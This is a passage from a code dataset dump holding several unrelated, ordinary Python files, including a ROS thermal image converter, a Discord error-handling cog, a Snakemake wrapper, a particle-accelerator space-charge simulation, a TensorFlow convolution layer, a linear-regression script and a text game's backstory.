SoundObject(segment_samples)\n lso.append(nso)\n return lso\n","sub_path":"src/SoundMusic/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106562157","text":"t = int(input())\n\nfor c in range(t):\n\ts = input()\n\tout = \"\"\n\tfor ch in s:\n\t\tif ch >= out[:1]:\n\t\t\tout = ch + out\n\t\telse:\n\t\t\tout = out + ch\n\tprint(\"Case #\" + str(c + 1) + \": \" + out)\n","sub_path":"codes/CodeJamCrawler/16_1_1/blesswin/thelastword.py","file_name":"thelastword.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"240066481","text":"#!/usr/bin/env python\nimport rospy\nimport cv2\n\nimport struct\nfrom std_msgs.msg import UInt8MultiArray\nfrom sensor_msgs.msg import Image\nimport numpy as np\nfrom math import sqrt\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom std_msgs.msg import Header\n\nclass thermal_array_converter:\n\tdef __init__(self):\n\t\trospy.init_node('thermal_array_converter')\n\t\trospy.Subscriber('/thermal_0u', UInt8MultiArray, self.convert_data, callback_args=(0), queue_size=10)\n\t\trospy.Subscriber('/thermal_1u', UInt8MultiArray, self.convert_data, callback_args=(1), queue_size=10)\n\t\trospy.Subscriber('/thermal_2u', UInt8MultiArray, self.convert_data, callback_args=(2), queue_size=10)\n\t\tself.pub0 = rospy.Publisher('/thermal_img_0', Image)\n\t\tself.pub1 = rospy.Publisher('/thermal_img_1', Image)\n\t\tself.pub2 = rospy.Publisher('/thermal_img_2', Image)\n\t\tself.bridge = CvBridge()\n\t\n\tdef convert_data(self, msg, args):\n\t\t# which sensor sent the message\n\t\tsensor = args\n\t\t# array of temp ints coming from ROS\n\t\tdata = np.zeros(768, dtype=np.uint8)\n\t\t# copy data from message packet\n\t\tfor i in range(len(msg.data)):\n\t\t\tdata[i] = struct.unpack(\"B\", msg.data[i])[0]\n\t\tsmall_pixels = np.reshape(data, (24, 32))\n\t\tscaling_matrix = np.ones((30,40))\n\t\tresult = np.kron(small_pixels, scaling_matrix)\n\t\tresult = 
np.uint8(result)\n\t\tbgrResult = cv2.merge((result, result, result))\n\t\t\n\t\tmsg_out = None\n\t\ttry:\n\t\t\tmsg_out = self.bridge.cv2_to_imgmsg(bgrResult, \"rgb8\")\n\t\texcept CvBridgeError as e:\n\t\t\trospy.logerr(e)\n\t\tif not msg_out == None:\n\t\t\tif args==0:\n\t\t\t\tself.pub0.publish(msg_out)\n\t\t\telif args==1:\n\t\t\t\tself.pub1.publish(msg_out)\n\t\t\telse:\n\t\t\t\tself.pub2.publish(msg_out)\n\n\nif __name__ == \"__main__\":\n\tthermal_array_converter()\n\trospy.spin()\n","sub_path":"scripts/gui/scripts/thermal_array_converter.py","file_name":"thermal_array_converter.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315571329","text":"import discord\nfrom discord.ext import commands\n\n\nclass Errors(commands.Cog):\n def __init__(self, client):\n self.client: commands.Bot = client\n self.config = client.config\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You had some missing arguments, here's the help page:\")\n await ctx.send_help(ctx.command)\n\n elif isinstance(error, commands.MissingPermissions):\n await ctx.send(\"You don't have permission to run that command\")\n\n elif isinstance(error, commands.BotMissingPermissions):\n await ctx.send(f\"The bot is missing the following permission:\\n{error.missing_perms}\")\n\n else:\n print(f\"{ctx.author.mention} had error '{error}' in command '{ctx.message.content}'\")\n\n\ndef setup(client):\n client.add_cog(Errors(client))\n","sub_path":"cogs/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127378977","text":"# -*- coding: utf-8 -*-\n\"\"\"Wrapper for running EasyBayes-Filter in parallel, genome is split into windows\n\nisort:skip_file\n\"\"\"\n\nimport os\nimport sys\nimport textwrap\n\nfrom snakemake import shell\n\n# A hack is required for being able to import snappy_wrappers modules when in development mode.\n# TODO: is there a more elegant way?\nbase_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\"))\nsys.path.insert(0, base_dir)\n\n# pylint: disable=wrong-import-position\nfrom snappy_wrappers.wrapper_parallel import (\n ParallelVcfOutputBaseWrapper,\n ResourceUsage,\n gib,\n hours,\n) # noqa\n\n\nclass ParallelEasyBayesFilterWrapper(ParallelVcfOutputBaseWrapper):\n \"\"\"Parallel execution of somatic variant annotation: eb_filter``.\"\"\"\n\n inner_wrapper = \"eb_filter\"\n step_name = \"somatic_variant_filtration\"\n tool_name = \"eb_filter\"\n\n def __init__(self, snakemake):\n super().__init__(snakemake)\n self.job_resources = ResourceUsage(\n cores=2,\n memory=gib(8.0 * self.get_job_mult_memory()),\n duration=hours(4 * self.get_job_mult_time()),\n )\n self.merge_resources = ResourceUsage(\n cores=2,\n memory=gib(2.0 * self.get_merge_mult_memory()),\n duration=hours(4 * self.get_merge_mult_time()),\n )\n\n def construct_parallel_rules(self):\n \"\"\"Construct the rules for parallel processing to generate.\"\"\"\n for jobno, region in enumerate(self.get_regions()):\n params = dict(self.snakemake.params)\n params.setdefault(\"args\", {}).update({\"interval\": region.human_readable(False)})\n output = {\n key: \"job_out.{jobno}.d/out/tmp_{jobno}.{ext}\".format(jobno=jobno, ext=ext)\n for key, ext in self.key_ext.items()\n }\n 
vals = {\n \"input_vcf\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.vcf))\n ),\n \"input_bam\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.bam))\n ),\n \"input_txt\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.txt))\n ),\n \"jobno\": jobno,\n \"params\": repr(params),\n \"output\": repr(output),\n \"wrapper_prefix\": \"file://\" + self.wrapper_base_dir,\n \"inner_wrapper\": self.inner_wrapper,\n \"resources\": repr(self.res_converter(self.job_resources).to_res_dict()),\n }\n yield textwrap.dedent(\n r\"\"\"\n rule chunk_{jobno}:\n input:\n vcf={input_vcf},\n bam={input_bam},\n txt={input_txt},\n output:\n touch(\"job_out.{jobno}.d/.done\"),\n **{output}\n params:\n **{params}\n wrapper: '{wrapper_prefix}/snappy_wrappers/wrappers/{inner_wrapper}'\n\n\n cluster_config['chunk_{jobno}'] = {resources}\n \"\"\"\n ).format(**vals).lstrip()\n\n\n# Kick off execution using the wrapper class defined above.\nParallelEasyBayesFilterWrapper(snakemake).run().shutdown_logging()\n\n# Compute MD5 sums of logs.\nshell(\n r\"\"\"\nmd5sum {snakemake.log.log} >{snakemake.log.log_md5}\n\"\"\"\n)\n","sub_path":"snappy_wrappers/wrappers/eb_filter_par/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"566525016","text":"import pathlib\nimport json\nimport numpy as np\n\nimport xobjects as xo\nimport xline as xl\nimport xpart as xp\nimport xtrack as xt\nimport xfields as xf\n\nfname_sequence = ('../../test_data/sps_w_spacecharge/'\n 'line_with_spacecharge_and_particle.json')\n\nfname_optics = ('../../test_data/sps_w_spacecharge/'\n 'optics_and_co_at_start_ring.json')\n\nseq_name = 'sps'\nbunch_intensity = 1e11/3\nsigma_z = 22.5e-2/3\nneps_x=2.5e-6\nneps_y=2.5e-6\nn_part=int(1e6)\nrf_voltage=3e6\nnum_turns=32\n\nmode = 'frozen'\nmode = 'quasi-frozen'\nmode = 'pic'\n\n####################\n# Choose a context #\n####################\n\n#context = xo.ContextCpu()\ncontext = xo.ContextCupy()\n#context = xo.ContextPyopencl('0.0')\n\n_buffer = context.new_buffer()\n\nprint(context)\n\n##################\n# Get a sequence #\n##################\n\nwith open(fname_sequence, 'r') as fid:\n input_data = json.load(fid)\nsequence = xl.Line.from_dict(input_data['line'])\n\nfirst_sc = sequence.elements[1]\nsigma_x = first_sc.sigma_x\nsigma_y = first_sc.sigma_y\n\n##########################\n# Configure space-charge #\n##########################\n\nif mode == 'frozen':\n pass # Already configured in line\nelif mode == 'quasi-frozen':\n xf.replace_spaceharge_with_quasi_frozen(\n sequence, _buffer=_buffer,\n update_mean_x_on_track=True,\n update_mean_y_on_track=True)\nelif mode == 'pic':\n pic_collection, all_pics = xf.replace_spaceharge_with_PIC(\n _context=context, sequence=sequence,\n n_sigmas_range_pic_x=8,\n n_sigmas_range_pic_y=8,\n nx_grid=256, ny_grid=256, nz_grid=100,\n n_lims_x=7, n_lims_y=3,\n z_range=(-3*sigma_z, 3*sigma_z))\nelse:\n raise ValueError(f'Invalid mode: {mode}')\n\n########################\n# Get optics and orbit #\n########################\n\nwith open(fname_optics, 'r') as fid:\n ddd = json.load(fid)\npart_on_co = xp.Particles.from_dict(ddd['particle_on_madx_co'])\nRR = np.array(ddd['RR_madx'])\n\n\n#################\n# Build Tracker #\n#################\ntracker = xt.Tracker(_buffer=_buffer,\n sequence=sequence)\n\n####################################\n# Generate particles for 
footprint #\n####################################\n\npart = xp.generate_matched_gaussian_bunch(\n num_particles=n_part, total_intensity_particles=bunch_intensity,\n nemitt_x=neps_x, nemitt_y=neps_y, sigma_z=sigma_z,\n particle_on_co=part_on_co, R_matrix=RR,\n circumference=6911., alpha_momentum_compaction=0.0030777,\n rf_harmonic=4620, rf_voltage=rf_voltage, rf_phase=0)\n\nimport footprint\nr_max_sigma = 5\nN_r_footprint = 10\nN_theta_footprint = 8\nxy_norm = footprint.initial_xy_polar(\n r_min=0.3, r_max=r_max_sigma,\n r_N=N_r_footprint + 1,\n theta_min=0.05 * np.pi / 2,\n theta_max=np.pi / 2 - 0.05 * np.pi / 2,\n theta_N=N_theta_footprint)\n\nN_footprint = len(xy_norm[:, :, 0].flatten())\npart.x[:N_footprint] = sigma_x*xy_norm[:, :, 0].flatten()\npart.y[:N_footprint] = sigma_y*xy_norm[:, :, 1].flatten()\npart.px[:N_footprint] = 0.\npart.py[:N_footprint] = 0.\npart.zeta[:N_footprint] = 0.\npart._delta[:N_footprint] = 0.\npart._rpp[:N_footprint] = 0.\npart._rvv[:N_footprint] = 0.\n\nxtparticles = xt.Particles(_context=context, **part.to_dict())\n\n#########\n# Track #\n#########\nx_tbt = np.zeros((N_footprint, num_turns), dtype=np.float64)\ny_tbt = np.zeros((N_footprint, num_turns), dtype=np.float64)\nfor ii in range(num_turns):\n print(f'Turn: {ii}', end='\\r', flush=True)\n x_tbt[:, ii] = context.nparray_from_context_array(xtparticles.x[:N_footprint]).copy()\n y_tbt[:, ii] = context.nparray_from_context_array(xtparticles.y[:N_footprint]).copy()\n tracker.track(xtparticles)\n\n######################\n# Frequency analysis #\n######################\nimport NAFFlib\n\nQx = np.zeros(N_footprint)\nQy = np.zeros(N_footprint)\n\nfor i_part in range(N_footprint):\n Qx[i_part] = NAFFlib.get_tune(x_tbt[i_part, :])\n Qy[i_part] = NAFFlib.get_tune(y_tbt[i_part, :])\n\nQxy_fp = np.zeros_like(xy_norm)\n\nQxy_fp[:, :, 0] = np.reshape(Qx, Qxy_fp[:, :, 0].shape)\nQxy_fp[:, :, 1] = np.reshape(Qy, Qxy_fp[:, :, 1].shape)\n\nimport matplotlib.pyplot as plt\nplt.close('all')\n\nfig3 = plt.figure(3)\naxcoord = fig3.add_subplot(1, 1, 1)\nfootprint.draw_footprint(xy_norm, axis_object=axcoord, linewidth = 1)\naxcoord.set_xlim(right=np.max(xy_norm[:, :, 0]))\naxcoord.set_ylim(top=np.max(xy_norm[:, :, 1]))\n\nfig4 = plt.figure(4)\naxFP = fig4.add_subplot(1, 1, 1)\nfootprint.draw_footprint(Qxy_fp, axis_object=axFP, linewidth = 1)\naxFP.set_xlim(.1, .16)\naxFP.set_ylim(.18, .25)\naxFP.set_aspect('equal')\nfig4.suptitle(mode)\nplt.show()\n","sub_path":"examples/spacecharge/003_spacecharge_footprint.py","file_name":"003_spacecharge_footprint.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"638672565","text":"import sys\nimport pathlib\n\nimport zmq\nimport molsim_job_scheduler as mjs\n\nassert len(sys.argv) == 2\n\nqsub_file = pathlib.Path(sys.argv[1])\nassert qsub_file.exists()\n\nnodes = mjs.extract_nodes_from_qsub(qsub_file)\nassert nodes is not None\n\n# Check nodes format.\nmjs.parse_nodes(nodes)\n\ncontext = zmq.Context()\n\n# Socket to talk to server\nsocket = context.socket(zmq.REQ)\nsocket.connect(\"tcp://localhost:{}\".format(mjs.JobManipulator.PORT))\n\n# message = \"qas|qsubfile\"\nmessage = \"qas|\" + str(qsub_file.resolve())\nsocket.send(message.encode())\nprint(qsub_file)\nprint(socket.recv().decode(\"utf-8\"))\n","sub_path":"qas.py","file_name":"qas.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"517911335","text":"# -*- coding: utf8 -*-\r\n# author: ronniecao\r\nimport numpy\r\nimport math\r\nimport tensorflow as tf\r\nimport random\r\nimport src.layer.utils as utils\r\nfrom src.layer.batch_normal_layer import BatchNormalLayer\r\n\r\n\r\nclass ConvLayer:\r\n \r\n def __init__(self, y_size, x_size, y_stride, x_stride, n_filter, activation='relu',\r\n batch_normal=False, weight_decay=None, name='conv',\r\n input_shape=None, prev_layer=None):\r\n # params\r\n self.y_size = y_size\r\n self.x_size = x_size\r\n self.y_stride = y_stride\r\n self.x_stride = x_stride\r\n self.n_filter = n_filter\r\n self.activation = activation\r\n self.batch_normal = batch_normal\r\n self.weight_decay = weight_decay\r\n self.name = name\r\n self.ltype = 'conv'\r\n if prev_layer:\r\n self.prev_layer = prev_layer\r\n self.input_shape = prev_layer.output_shape\r\n elif input_shape:\r\n self.prev_layer = None\r\n self.input_shape = input_shape\r\n else:\r\n raise Exception('ERROR: prev_layer or input_shape cannot be None!')\r\n \r\n # compute the receptive field\r\n self.feel_field = [1, 1]\r\n self.feel_field[0] = min(self.input_shape[0], 1 + int((self.y_size+1)/2))\r\n self.feel_field[1] = min(self.input_shape[1], 1 + int((self.x_size+1)/2))\r\n prev_layer = self.prev_layer\r\n while prev_layer:\r\n if prev_layer.ltype == 'conv':\r\n self.feel_field[0] = min(prev_layer.input_shape[0], \r\n self.feel_field[0] + int((prev_layer.y_size+1)/2))\r\n self.feel_field[1] = min(prev_layer.input_shape[1], \r\n self.feel_field[1] + int((prev_layer.x_size+1)/2))\r\n elif prev_layer.ltype == 'pool':\r\n self.feel_field[0] = min(prev_layer.input_shape[0], \r\n self.feel_field[0] * int(prev_layer.y_size))\r\n self.feel_field[1] = min(prev_layer.input_shape[1], \r\n self.feel_field[1] * int(prev_layer.x_size))\r\n prev_layer = prev_layer.prev_layer\r\n \r\n self.leaky_scale = tf.constant(0.1, dtype=tf.float32)\r\n \r\n with tf.name_scope('%s_def' % (self.name)) as scope:\r\n # weight matrix\r\n numpy.random.seed(0)\r\n scale = math.sqrt(2.0 / (self.y_size * self.x_size * self.input_shape[2]))\r\n init_value = scale * numpy.random.normal(size=[\r\n self.y_size, self.x_size, self.input_shape[2], self.n_filter], loc=0.0, scale=1.0)\r\n self.weight = tf.Variable(init_value, dtype=tf.float32, name='weight')\r\n \r\n # parameters for the batch normalization technique\r\n if self.batch_normal:\r\n self.batch_normal_layer = BatchNormalLayer(self.n_filter, name=name)\r\n else:\r\n # bias vector\r\n self.bias = tf.Variable(\r\n initial_value=tf.constant(0.0, shape=[self.n_filter]),\r\n name='bias')\r\n \r\n # print the layer's weight, input and output info\r\n # calculate input_shape and output_shape\r\n self.output_shape = [\r\n int(self.input_shape[0]/self.y_stride),\r\n int(self.input_shape[1]/self.x_stride), \r\n self.n_filter]\r\n print('%-10s\\t%-25s\\t%-20s\\t%-20s\\t%s' % (\r\n self.name, \r\n '((%d, %d) / (%d, %d) * %d)' % (\r\n self.y_size, self.x_size, self.y_stride, self.x_stride, self.n_filter),\r\n '(%d, %d, %d)' % (\r\n self.input_shape[0], self.input_shape[1], self.input_shape[2]),\r\n '(%d, %d, %d)' % (\r\n self.output_shape[0], self.output_shape[1], self.output_shape[2]),\r\n '(%d, %d)' % (\r\n self.feel_field[0], self.feel_field[1])))\r\n self.calculation = self.output_shape[0] * self.output_shape[1] * \\\r\n self.output_shape[2] * self.input_shape[2] * self.y_size * self.x_size\r\n \r\n def get_output(self, input, is_training=True):\r\n with tf.name_scope('%s_cal' % (self.name)) as scope:\r\n # hidden states\r\n self.conv = tf.nn.conv2d(\r\n input=input, filter=self.weight, \r\n strides=[1, 
self.y_stride, self.x_stride, 1], padding='SAME', name='cal_conv')\r\n \r\n # batch normalization 技术\r\n if self.batch_normal:\r\n self.hidden = self.batch_normal_layer.get_output(self.conv, is_training=is_training)\r\n else:\r\n self.hidden = self.conv + self.bias\r\n \r\n # activation\r\n if self.activation == 'relu':\r\n self.output = tf.nn.relu(self.hidden)\r\n elif self.activation == 'tanh':\r\n self.output = tf.nn.tanh(self.hidden)\r\n elif self.activation == 'leaky_relu':\r\n self.output = self.leaky_relu(self.hidden)\r\n elif self.activation == 'sigmoid':\r\n self.output = tf.nn.sigmoid(self.hidden)\r\n elif self.activation == 'none':\r\n self.output = self.hidden\r\n \r\n # gradient constraint\r\n g = tf.get_default_graph()\r\n with g.gradient_override_map({\"Identity\": \"CustomClipGrad\"}):\r\n self.output = tf.identity(self.output, name=\"Identity\")\r\n \r\n return self.output\r\n \r\n def leaky_relu(self, input):\r\n output = tf.maximum(self.leaky_scale * input, input, name='leaky_relu')\r\n \r\n return output\r\n\r\n @tf.RegisterGradient(\"CustomClipGrad\")\r\n def _clip_grad(unused_op, grad):\r\n return tf.clip_by_value(grad, -1, 1)\r\n\r\n def random_normal(self, shape, mean=0.0, stddev=1.0):\r\n epsilon = 1e-5\r\n twopi = 2.0 * math.pi\r\n\r\n n_dims = 1\r\n for dim in shape:\r\n n_dims *= dim\r\n array = numpy.zeros((n_dims, ), dtype='float32')\r\n \r\n for i in range(int(n_dims/2)):\r\n u1 = 0.0\r\n while u1 < epsilon:\r\n u1 = random.random()\r\n u2 = random.random()\r\n z0 = math.sqrt(-2.0 * math.log(u1)) * math.cos(twopi * u2)\r\n z1 = math.sqrt(-2.0 * math.log(u1)) * math.sin(twopi * u2)\r\n array[2*i] = z0 * stddev + mean\r\n array[2*i+1] = z1 * stddev + mean\r\n\r\n if n_dims % 2 == 1:\r\n while u1 < epsilon:\r\n u1 = random.random()\r\n u2 = random.random()\r\n z0 = math.sqrt(-2.0 * math.log(u1)) * math.cos(twopi * u2)\r\n array[n_dims-1] = z0\r\n\r\n array = numpy.reshape(array, shape)\r\n\r\n return array\r\n\r\n def rand_normal(self, shape, mean=0.0, stddev=1.0):\r\n import pdfinsight.ai.yolo_tf.src.tools.pyolo as pyolo\r\n n_dims = 1\r\n for dim in shape:\r\n n_dims *= dim\r\n array = numpy.zeros((n_dims, ), dtype='float32')\r\n \r\n for i in range(n_dims):\r\n array[i] = pyolo.rand_normal()\r\n \r\n array = numpy.reshape(array, shape)\r\n \r\n return array\r\n","sub_path":"src/layer/conv_layer.py","file_name":"conv_layer.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"394136996","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on:2018.1.13\nlinear regression V3\n@author: pengxu\n\"\"\"\nimport os, sys, time, logging\nimport pandas as pd\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nimport linear_regression as lr\n\nINDEX_ID = 'ID'\n\n\ndef dataframe_to_excel(data, savepath, name):\n #将数据按照excel保存,需要将INDEX_ID转化保存\n save_path_name = os.path.join(savepath, name+'.xlsx')\n writer = pd.ExcelWriter(save_path_name)\n data.to_excel(writer,'Sheet1')\n writer.save() \n\n \n\ndef two_data_split_label(X,test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index=[]\n test_num=int(X_num*test_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del train_index[randomIndex]\n #train,test的index是抽取的数据集X的序号\n train=X[train_index]\n test=X[test_index]\n return train,test \n 
\ndef two_data_split_unlabel(X, Y, test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index=[]\n test_num=int(X_num*test_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del train_index[randomIndex]\n #train,test的index是抽取的数据集X的序号\n train_X = X[train_index]\n train_Y = Y[train_index]\n test_X = X[test_index]\n test_Y = Y[test_index]\n return train_X, train_Y[:,0], test_X, test_Y[:,0]\n \ndef two_data_split_unlabel_fix(X, Y, test_size=0.3):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n fix_len = int((1-test_size)*X_num)\n #train,test的index是抽取的数据集X的序号\n train_X = X[:fix_len,:]\n train_Y = Y[:fix_len]\n test_X = X[fix_len:,:]\n test_Y = Y[fix_len:]\n return train_X, train_Y[:,0], test_X, test_Y[:,0] \n \ndef three_data_split_unlabel(X, Y, cv_size=0.2, test_size=0.2):\n #X:含label的数据集:分割成训练集和测试集\n #test_size:测试集占整个数据集的比例\n X_num=X.shape[0]\n train_index=[x for x in range(X_num)]\n test_index = []\n cv_index = []\n test_num = int(X_num*test_size)\n cv_num = int(X_num*cv_size)\n for i in range(test_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n test_index.append(train_index[randomIndex])\n del(train_index[randomIndex])\n for i in range(cv_num):\n randomIndex=int(np.random.uniform(0,len(train_index)))\n cv_index.append(train_index[randomIndex])\n del(train_index[randomIndex])\n #train,test的index是抽取的数据集X的序号\n train_X = X[train_index] \n train_Y = Y[train_index]\n cv_X = X[cv_index]\n cv_Y = Y[cv_index]\n test_X = X[test_index]\n test_Y = Y[test_index]\n return train_X, train_Y[:,0], cv_X, cv_Y[:,0], test_X, test_Y[:,0]\n\n \nclass DataLinReg:\n def __init__(self):\n #日志保存\n log_savepath = r'.'\n log_filename = \"record_data_preprocess.log\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=os.path.join(log_savepath, log_filename),\n filemode='a')\n #################################################################################################\n #定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n #formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s') #levelname共占据8个字段\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n #################################################################################################\n \n self.data_directory = r'temp_data_v6_v3\\(0.02_100_0.2)\\mean_diff_0.2'\n self.train_x_name = '训练'\n self.train_y_name = 'Y'\n self.test_a_name = '测试A'\n self.test_b_name = '测试B'\n \n logging.info('read files from %s, the data_preprocess started !!!' 
% (self.data_directory))\n \n def data_read(self):\n #将所有数据读出,四组数据,前三组的列数完全相同\n self.raw_data = {} #保存原始xlsx全部信息\n for data_name in [self.train_x_name, self.train_y_name, self.test_a_name, self.test_b_name]:\n data_path = os.path.join(self.data_directory, data_name + '.xlsx')\n df = pd.read_excel(data_path)\n df.index = df[INDEX_ID].tolist() #将ID取消了\n del(df[INDEX_ID])\n df.index.name = INDEX_ID #将index名称获取\n self.raw_data[data_name] = df\n self.test_a_index = self.raw_data[self.test_a_name].index\n self.test_b_index = self.raw_data[self.test_b_name].index\n logging.info('data_read successfully !!!')\n #将dataframe转为numpy\n self.new_data = {} #保存全部预处理之后的数据\n for data_name in [self.train_x_name, self.train_y_name, self.test_a_name, self.test_b_name]:\n self.new_data[data_name] = np.array(self.raw_data[data_name])#保存所有数据进来\n #将train的数据进行分割,用于训练\n (self.train_X, self.train_Y, self.cv_X, self.cv_Y) = two_data_split_unlabel_fix(self.new_data['训练'], self.new_data['Y'], test_size=0.2)\n logging.info('labeled data separated successfully !!!')\n \n def linear_analysis(self):\n #利用线性回归函数进行相关计算\n \n l_candidate = [0, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3, 10, 30, 100, 300, 1000, 3000]\n training_cost, cv_cost = [], []\n for l in l_candidate:\n res = lr.linear_regression_np(self.train_X, self.train_Y, l)\n tc = lr.cost(res.x, self.train_X, self.train_Y)\n cv = lr.cost(res.x, self.cv_X, self.cv_Y)\n training_cost.append(tc)\n cv_cost.append(cv)\n sel_index = np.argmin(cv_cost) #其实可以直接将sel_index=0,因为目前\n #sel_index = 0 #其实可以直接将sel_index=0,因为目前\n set_l = l_candidate[sel_index]\n #绘图看效果\n plt.figure(figsize = (12.7, 7.8)) \n plt.plot(l_candidate, training_cost, label='training')\n plt.plot(l_candidate, cv_cost, label='cross validation')\n plt.xscale('log')\n plt.ylim([0,0.1])\n plt.legend(loc=2)\n #plt.yscale('log')\n plt.xlabel('lambda')\n plt.ylabel('cost')\n plt.suptitle('lambda: %f, train: %f, cv: %f'%(set_l, training_cost[sel_index], cv_cost[sel_index]), fontsize = 12, fontweight = 'bold')\n title_cost_l = 'lambda'\n plt.savefig(os.path.join(self.data_directory, title_cost_l))\n plt.close('all')\n \n logging.info('lambda figure saved successfully !!!')\n \n #m个样本进行训练查看,判断bias和variance\n training_cost, cv_cost = [], []\n m = self.train_X.shape[0]\n for i in range(1, m+1): #查看随着训练样本m的增大,cost的变化情况\n res = lr.linear_regression_np(self.train_X[:i, :], self.train_Y[:i], l=set_l)\n tc = lr.regularized_cost(res.x, self.train_X[:i, :], self.train_Y[:i], l=set_l)\n cv = lr.regularized_cost(res.x, self.cv_X, self.cv_Y, l=set_l)\n training_cost.append(tc)\n cv_cost.append(cv)\n #绘图看效果\n plt.figure(figsize = (12.7, 7.8)) \n plt.plot(np.arange(1, m+1), training_cost, label='training cost')\n plt.plot(np.arange(1, m+1), cv_cost, label='cv cost')\n plt.legend(loc=2)\n plt.yscale('log')\n plt.ylim([1e-8,1e2])\n plt.xlabel('sample_num')\n plt.ylabel('cost')\n plt.suptitle('cost vs sample_num', fontsize = 12, fontweight = 'bold')\n title_cost_l = 'sample_num'\n plt.savefig(os.path.join(self.data_directory, title_cost_l))\n plt.close('all')\n \n logging.info('sample_num figure saved successfully !!!')\n \n self.theta = lr.linear_regression_np(self.train_X, self.train_Y, set_l).x\n \n def results_get(self):\n #根据上述结果,计算A和B的数据结果\n test_a_Y = self.new_data['测试A'] @ self.theta\n test_b_Y = self.new_data['测试B'] @ self.theta\n test_a_dataframe = pd.DataFrame(test_a_Y, columns = ['Y'], index = self.test_a_index)\n test_b_dataframe = pd.DataFrame(test_b_Y, columns = ['Y'], index = self.test_b_index)\n 
dataframe_to_excel(test_a_dataframe, self.data_directory, '测试A_Y')\n dataframe_to_excel(test_b_dataframe, self.data_directory, '测试B_Y')\n logging.info('data saved successfully !!!')\n \ndef main():\n time_start = time.time()\n \n dlr = DataLinReg()\n dlr.data_read() #读“训练.xlsx”数据时间太长\n dlr.linear_analysis() #获得最优系数,以及train, cv, test的误差(图上直接绘图)\n dlr.results_get() #根据给出的最优系数,得到所需的预测A和B\n\n time_stop = time.time() \n logging.info('The data_preprocess is finished, all process time is %d s !!!' %(time_stop-time_start))\n \nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"TianChi_Quality-prediction-of-intelligent-manufacturing-master/data_linear_regression_v3.py","file_name":"data_linear_regression_v3.py","file_ext":"py","file_size_in_byte":9954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"423426045","text":"def showBackstory():\n\tfrom os import system as sysShell\n\tfrom time import sleep as wait\n\n\tvalidInput = False\n\twhile validInput is not True:\n\t\tshowBS = input(\"Play the backstory (recommended to new players)? (y/N) >\").lower()\n\t\tif showBS == \"n\":\n\t\t\tshowBS = False\n\t\t\tvalidInput = True\n\t\telif showBS == \"y\":\n\t\t\tshowBS = True\n\t\t\tvalidInput = True\n\t\telse:\n\t\t\tprint(\"Please use valid input (y or n).\")\n\tif showBS:\n\t\tsysShell(\"reset\")\n\t\tprint('BLACK ALERT. BLACK ALERT.')\n\t\twait(2)\n\t\tprint('\"...reactor is overloaded!\"')\n\t\twait(2)\n\t\tprint('\"...quantum containment field has failed, and the...\"')\n\t\twait(2)\n\t\tprint('BLACK ALERT. BLACK ALERT.')\n\t\twait(2)\n\t\tprint('\"...20 seconds from total breach...\"')\n\t\twait(1)\n\t\tprint('\"...somebody, you have to...\"')\n\t\twait(1)\n\t\tprint('\"...can\\'t hold it in...\"')\n\t\twait(0.5)\n\t\tprint('\"...supposed to lead us to utopia!\"')\n\t\twait(0.5)\n\t\tprint('\"...all doomed, we\\'re all doomed, we\\'re all doomed...\"')\n\t\twait(0.4)\n\t\tprint('\"...continuum destabilisation imminent...\"')\n\t\twait(0.3)\n\t\tprint('\"...all meant to be safe last June...\"')\n\t\twait(3)\n\t\tprint('')\n\t\tprint('')\n\t\tprint('BLACK 